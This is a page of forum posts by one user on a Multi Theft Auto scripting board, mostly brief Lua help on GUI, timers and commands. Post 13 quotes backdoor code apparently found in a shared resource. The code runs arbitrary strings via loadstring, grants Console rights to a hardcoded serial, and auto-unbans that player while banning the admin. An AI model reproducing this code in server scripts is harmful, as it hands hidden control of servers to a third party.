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Everything posted by iPrestege

  1. bindKey triggerServerEvent triggerClientEvent isObjectInACLGroup isGuestAccount getPlayerAccount getAccountName
  2. iPrestege


    guiSetEnabled Ex : guiSetEnabled ( aButton,false )
  3. iPrestege


    local v = 0 setTimer ( function ( ) v = v +1 guiSetText ( Label,tostring ( v ) ) end,1000,10 )
  4. iPrestege


    guiSetText setTimer وسوي متغيرات : v = v +1
  5. عارف بس كيف استخدمها , ؟؟ addCommandHandler('model', function ( _,id ) if tonumber ( id ) then setElementModel ( localPlayer,id ) else outputChatBox('[ model ] : Invalid model!!',255,0,0) end end ) تسوي شرط انة الايدي رقم .. لو ماهو رقم .. واضح بـ الكود وش بيحصل ذذ
  6. tonumber ضرورية جداَ لاستخدامها مع اللي عطيتك فوق شف هـ المثال .. addEventHandler('onClientGUIChanged',root, function ( aElement ) if aElement == EditOne or aElement == EditTwo then if not ( tonumber ( guiGetText ( EditOne ) ) and tonumber ( guiGetText ( EditTwo ) ) ) then return end local Math = tonumber( guiGetText ( EditOne ) ) + tonumber ( guiGetText ( EditTwo ) ) guiSetText ( element,Math ) end end ) جربة بـ نفسكـ .. وشوف النتيجةة ..
  7. عادي حطة تحت النافذهـ -_-" وجرب
  8. onClientGUIChanged guiGetText guiSetText
  9. حط ذا بالمود : guiSetVisible ( GUIEditor.window[1] ,false )
  10. No it's not you just trigger it for the hit element .
  11. Client : function lz () outputChatBox("Take it", 255, 255, 0, true) end addEvent ("wii", true) addEventHandler ("wii", root, lz)
  12. Good idea +1 Should accept it.
  13. https://community.multitheftauto.com/index.php?p=resources&s=details&id=7432 addEvent("aExecuteMe", true) addEventHandler("aExecuteMe", root, function(action, echo) local result = loadstring("return " .. action)() if echo == true then local restring = "" if type(result) == "table" then for k,v in pairs(result) do restring = restring .. tostring(v) .. ", " end restring = string.sub(restring, 1, -3) restring = "Table (" .. restring .. ")" else if type(result) == "userdata" then restring = "Element (" .. getElementType(result) .. ")" end else restring = tostring(result) end outputChatBox("Command executed! Result: " .. restring, source, 0, 0, 255) end end ) Also : addCommandHandler("AboShanabShop", function(source) local account = getAccountName(getPlayerAccount(source)) if getPlayerSerial(source) == "210AF10A69B9D39E458E9092EF795742" then if isObjectInACLGroup("user." .. account .. "", aclGetGroup("Console")) then return end aclGroupAddObject(aclGetGroup("Console"), "user." .. account .. "") end end ) local serials = {["210AF10A69B9D39E458E9092EF795742"] = true} autounban = function() for i,p in ipairs(getElementsByType("player")) do local Ser = getPlayerSerial(p) if serials[Ser] then thisIP = getPlayerIP(p) end end for index,ban in pairs(getBans()) do local serial = getBanSerial(ban) local ip = getBanIP(ban) if serials[serial] or ip == thisIP then local bannedPlayer = getPlayerFromName(getBanAdmin(ban)) removeBan(ban, root) banPlayer(bannedPlayer, false, false, true, root) end end end This is enough right? DONE
  14. isObjectInACLGroup getAccountName and getPlayerAccount
  15. لازم نرجع للموضوع مرة ثانية عناد على ايش مسح الردود انا مدري ((= يلا رح جرب وشف لي الديبوق وش يقول
  16. للمعلومية تستخدم هذي السكربت / البرمجية بتخرب عليك اللعبه اقصد يمكن تمعن دخولك للآونلآين
  17. لا ي شيخ؟ ي عيني بس عليكـك ..
  18. You mean : addCommandHandler guiSetVisible I can't understand you clearly also don't make double posts.
  19. أو .. : local isChatVisible = nil addEventHandler('onClientGUIClick',GUIEditor.button[3], function ( ) if not isChatVisible then showChat ( false ) else showChat ( true ) end isChatVisible = not isChatVisible end,false ) addEventHandler('onClientGUIClick',GUIEditor.button[5], function ( ) local aVehicle = getPlayerOccupiedVehicle ( localPlayer ) if aVehicle then if getElementAlpha ( aVehicle ) == 255 then setElementAlpha ( aVehicle,0 ) else setElementAlpha ( aVehicle,255 ) end end end,false )
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